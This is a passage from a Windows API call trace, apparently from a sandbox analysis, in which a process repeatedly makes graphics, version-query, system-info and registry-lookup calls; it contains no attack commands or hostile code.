(hrgnDst=0x1040c9a, hrgnSrc1=0xf6040713, hrgnSrc2=0xec04027d, iMode=1) returned 1 [0017.720] CombineRgn (hrgnDst=0x1040c9b, hrgnSrc1=0xf6040713, hrgnSrc2=0xec04027d, iMode=4) returned 2 [0017.720] CreateSolidBrush (color=0xff) returned 0x2100c99 [0017.720] CreateSolidBrush (color=0xff0000) returned 0x1100c9c [0017.720] DeleteObject (ho=0x1100c9c) returned 1 [0017.720] DeleteObject (ho=0xec04027d) returned 1 [0017.720] DeleteObject (ho=0xf6040713) returned 1 [0017.720] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.720] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.720] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.720] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.720] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.720] BeginPath (hdc=0x0) returned 0 [0017.720] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.720] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.720] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.720] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.720] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.720] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.720] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.721] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.721] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xed04027d [0017.721] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xf7040713 [0017.721] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c9d [0017.721] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c9e [0017.721] CombineRgn (hrgnDst=0x1040c9d, hrgnSrc1=0xed04027d, hrgnSrc2=0xf7040713, iMode=1) returned 1 [0017.721] CombineRgn (hrgnDst=0x1040c9e, hrgnSrc1=0xed04027d, hrgnSrc2=0xf7040713, iMode=4) returned 2 [0017.721] CreateSolidBrush (color=0xff) returned 0x2100c9c [0017.721] CreateSolidBrush (color=0xff0000) returned 0x1100c9f [0017.721] DeleteObject (ho=0x1100c9f) returned 1 [0017.721] DeleteObject (ho=0xf7040713) returned 1 [0017.721] DeleteObject (ho=0xed04027d) returned 1 [0017.721] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.721] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.721] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.721] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.721] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.721] BeginPath (hdc=0x0) returned 0 [0017.721] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.721] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.721] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.721] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.721] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.721] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.721] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.721] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.722] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xf8040713 [0017.722] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xee04027d [0017.722] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ca0 [0017.722] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ca1 [0017.722] CombineRgn (hrgnDst=0x1040ca0, hrgnSrc1=0xf8040713, hrgnSrc2=0xee04027d, iMode=1) returned 1 [0017.722] CombineRgn (hrgnDst=0x1040ca1, hrgnSrc1=0xf8040713, hrgnSrc2=0xee04027d, iMode=4) returned 2 [0017.722] CreateSolidBrush (color=0xff) returned 0x2100c9f [0017.722] CreateSolidBrush (color=0xff0000) returned 0x1100ca2 [0017.722] DeleteObject (ho=0x1100ca2) returned 1 [0017.722] DeleteObject (ho=0xee04027d) returned 1 [0017.722] DeleteObject (ho=0xf8040713) returned 1 [0017.722] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.722] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.722] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.722] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.722] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.722] BeginPath (hdc=0x0) returned 0 [0017.722] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.722] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.722] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.722] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.722] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.722] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.722] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.722] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.722] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xef04027d [0017.722] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xf9040713 [0017.722] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ca3 [0017.723] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ca4 [0017.723] CombineRgn (hrgnDst=0x1040ca3, hrgnSrc1=0xef04027d, hrgnSrc2=0xf9040713, iMode=1) returned 1 [0017.723] CombineRgn (hrgnDst=0x1040ca4, hrgnSrc1=0xef04027d, hrgnSrc2=0xf9040713, iMode=4) returned 2 [0017.723] CreateSolidBrush (color=0xff) returned 0x2100ca2 [0017.723] CreateSolidBrush (color=0xff0000) returned 0x1100ca5 [0017.723] DeleteObject (ho=0x1100ca5) returned 1 [0017.723] DeleteObject (ho=0xf9040713) returned 1 [0017.723] DeleteObject (ho=0xef04027d) returned 1 [0017.723] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.723] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.723] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.723] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.723] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.723] BeginPath (hdc=0x0) returned 0 [0017.723] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.723] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.723] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.723] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.723] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.723] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.723] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.723] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.723] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xfa040713 [0017.723] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xf004027d [0017.723] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ca6 [0017.723] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ca7 [0017.723] CombineRgn (hrgnDst=0x1040ca6, hrgnSrc1=0xfa040713, hrgnSrc2=0xf004027d, iMode=1) returned 1 [0017.723] CombineRgn (hrgnDst=0x1040ca7, hrgnSrc1=0xfa040713, hrgnSrc2=0xf004027d, iMode=4) returned 2 [0017.723] CreateSolidBrush (color=0xff) returned 0x2100ca5 [0017.724] CreateSolidBrush (color=0xff0000) returned 0x1100ca8 [0017.724] DeleteObject (ho=0x1100ca8) returned 1 [0017.724] DeleteObject (ho=0xf004027d) returned 1 [0017.724] DeleteObject (ho=0xfa040713) returned 1 [0017.724] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.724] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.724] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.724] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.724] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.724] BeginPath (hdc=0x0) returned 0 [0017.724] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.724] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.724] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.724] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.724] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.724] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.724] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.724] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.724] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xf104027d [0017.724] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xfb040713 [0017.724] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ca9 [0017.724] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040caa [0017.724] CombineRgn (hrgnDst=0x1040ca9, hrgnSrc1=0xf104027d, hrgnSrc2=0xfb040713, iMode=1) returned 1 [0017.724] CombineRgn (hrgnDst=0x1040caa, hrgnSrc1=0xf104027d, hrgnSrc2=0xfb040713, iMode=4) returned 2 [0017.724] CreateSolidBrush (color=0xff) returned 0x2100ca8 [0017.724] CreateSolidBrush (color=0xff0000) returned 0x1100cab [0017.725] DeleteObject (ho=0x1100cab) returned 1 [0017.725] DeleteObject (ho=0xfb040713) returned 1 [0017.725] DeleteObject (ho=0xf104027d) returned 1 [0017.725] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.725] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.725] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.725] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.725] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.725] BeginPath (hdc=0x0) returned 0 [0017.725] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.725] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.725] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.725] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.725] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.725] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.725] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.725] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.725] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xfc040713 [0017.725] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xf204027d [0017.725] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040cac [0017.725] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040cad [0017.725] CombineRgn (hrgnDst=0x1040cac, hrgnSrc1=0xfc040713, hrgnSrc2=0xf204027d, iMode=1) returned 1 [0017.725] CombineRgn (hrgnDst=0x1040cad, hrgnSrc1=0xfc040713, hrgnSrc2=0xf204027d, iMode=4) returned 2 [0017.725] CreateSolidBrush (color=0xff) returned 0x2100cab [0017.725] CreateSolidBrush (color=0xff0000) returned 0x1100cae [0017.725] DeleteObject (ho=0x1100cae) returned 1 [0017.725] DeleteObject (ho=0xf204027d) returned 1 [0017.725] DeleteObject (ho=0xfc040713) returned 1 [0017.726] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.726] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.726] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.726] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.726] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.726] BeginPath (hdc=0x0) returned 0 [0017.726] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.726] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.726] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.726] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.726] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.726] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.726] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.726] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.726] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xf304027d [0017.726] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xfd040713 [0017.726] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040caf [0017.726] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040cb0 [0017.726] CombineRgn (hrgnDst=0x1040caf, hrgnSrc1=0xf304027d, hrgnSrc2=0xfd040713, iMode=1) returned 1 [0017.726] CombineRgn (hrgnDst=0x1040cb0, hrgnSrc1=0xf304027d, hrgnSrc2=0xfd040713, iMode=4) returned 2 [0017.726] CreateSolidBrush (color=0xff) returned 0x2100cae [0017.726] CreateSolidBrush (color=0xff0000) returned 0x1100cb1 [0017.726] DeleteObject (ho=0x1100cb1) returned 1 [0017.726] DeleteObject (ho=0xfd040713) returned 1 [0017.726] DeleteObject (ho=0xf304027d) returned 1 [0017.726] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.726] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.727] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.727] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.727] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.727] BeginPath (hdc=0x0) returned 0 [0017.727] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.727] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.727] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.727] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.727] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.727] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.727] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.727] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.727] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xfe040713 [0017.727] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xf404027d [0017.727] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040cb2 [0017.727] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040cb3 [0017.727] CombineRgn (hrgnDst=0x1040cb2, hrgnSrc1=0xfe040713, hrgnSrc2=0xf404027d, iMode=1) returned 1 [0017.727] CombineRgn (hrgnDst=0x1040cb3, hrgnSrc1=0xfe040713, hrgnSrc2=0xf404027d, iMode=4) returned 2 [0017.727] CreateSolidBrush (color=0xff) returned 0x2100cb1 [0017.727] CreateSolidBrush (color=0xff0000) returned 0x1100cb4 [0017.727] DeleteObject (ho=0x1100cb4) returned 1 [0017.727] DeleteObject (ho=0xf404027d) returned 1 [0017.727] DeleteObject (ho=0xfe040713) returned 1 [0017.727] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.727] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.727] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.728] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.728] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.728] BeginPath (hdc=0x0) returned 0 [0017.728] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.728] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.728] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.728] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.728] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.728] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.728] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.728] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.728] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xf504027d [0017.728] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xff040713 [0017.728] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040cb5 [0017.728] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040cb6 [0017.728] CombineRgn (hrgnDst=0x1040cb5, hrgnSrc1=0xf504027d, hrgnSrc2=0xff040713, iMode=1) returned 1 [0017.728] CombineRgn (hrgnDst=0x1040cb6, hrgnSrc1=0xf504027d, hrgnSrc2=0xff040713, iMode=4) returned 2 [0017.728] CreateSolidBrush (color=0xff) returned 0x2100cb4 [0017.728] CreateSolidBrush (color=0xff0000) returned 0x1100cb7 [0017.728] DeleteObject (ho=0x1100cb7) returned 1 [0017.728] DeleteObject (ho=0xff040713) returned 1 [0017.728] DeleteObject (ho=0xf504027d) returned 1 [0017.728] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.728] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, 